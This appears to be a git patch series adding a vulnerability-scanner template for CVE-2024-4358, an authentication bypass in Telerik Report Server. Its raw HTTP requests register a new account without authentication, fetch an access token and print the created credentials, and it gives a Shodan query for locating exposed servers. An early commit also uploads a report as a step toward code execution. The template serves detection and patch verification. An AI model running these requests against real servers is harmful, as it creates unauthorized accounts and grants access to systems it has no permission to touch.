From 5addd1de0e3b4390ccdb316ff6536c8a84a48e1e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:10:34 +0530 Subject: [PATCH 1/4] Create CVE-2024-4358.yaml --- http/cves/2024/CVE-2024-4358.yaml | 87 +++++++++++++++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4358.yaml diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml new file mode 100644 index 0000000000..3e15ec1b3f --- /dev/null +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -0,0 +1,87 @@ +id: CVE-2024-4358 + +info: + name: Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + metadata: + shodan-query: "Log in | Telerik Report Server" + tags: cve,cve2024,telerik,progress,auth-bypass + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + report: "{{to_lower(rand_text_alpha(8))}}" + + content: {{}} ##To Be Added + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + - | + POST /api/reportserver/report HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} + + - | + POST /api/reports/clients HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"timeStamp": null} + + - | + POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: regex + name: clientid + part: body_4 + group: 1 + regex: + - '"clientId":"([a-z0-9]+)"' + internal: true From a2e926b9542274a3cf43c98579a06a3312b7145e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:13:57 +0530 Subject: [PATCH 2/4] fix lint error --- http/cves/2024/CVE-2024-4358.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3e15ec1b3f..3919c7c39f 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -20,8 +20,7 @@ variables: firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" report: "{{to_lower(rand_text_alpha(8))}}" - - content: {{}} ##To Be Added + content: "{{}}" ##To Be Added http: - raw: From a365149f938ed0d5e167a1d5a8cfd67da6a5c913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 17:51:14 +0530 Subject: [PATCH 3/4] minor update --- http/cves/2024/CVE-2024-4358.yaml | 46 ++++++++----------------------- 1 file changed, 12 insertions(+), 34 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3919c7c39f..32f7e2d3b0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -1,16 +1,21 @@ id: CVE-2024-4358 info: - name: Telerik Report Server - Authentication Bypass + name: Progress Telerik Report Server - Authentication Bypass author: DhiyaneshDK severity: critical description: | In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. reference: - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: "Log in | Telerik Report Server" + shodan-query: title:"Log in | Telerik Report Server" + verified: true + max-request: 2 tags: cve,cve2024,telerik,progress,auth-bypass variables: @@ -19,8 +24,6 @@ variables: email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" - report: "{{to_lower(rand_text_alpha(8))}}" - content: "{{}}" ##To Be Added http: - raw: @@ -38,33 +41,11 @@ http: grant_type=password&username={{user}}&password={{pass}} - - | - POST /api/reportserver/report HTTP/1.1 - Host: {{Hostname}} - Authorization: Bearer {{token}} - Content-Type: application/json - - {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} - - - | - POST /api/reports/clients HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"timeStamp": null} - - - | - POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} - matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' - 'status_code_2 == 200' condition: and @@ -77,10 +58,7 @@ http: - '"access_token":"([A-Z0-9a-z_-]+)"' internal: true - - type: regex - name: clientid - part: body_4 - group: 1 - regex: - - '"clientId":"([a-z0-9]+)"' - internal: true + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass' From c90632de186a2015707f3186ecc4482f00887da0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 14:43:34 +0530 Subject: [PATCH 4/4] add intrusive tag --- http/cves/2024/CVE-2024-4358.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 32f7e2d3b0..b2e32509c0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 - tags: cve,cve2024,telerik,progress,auth-bypass + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive variables: user: "{{rand_base(6)}}"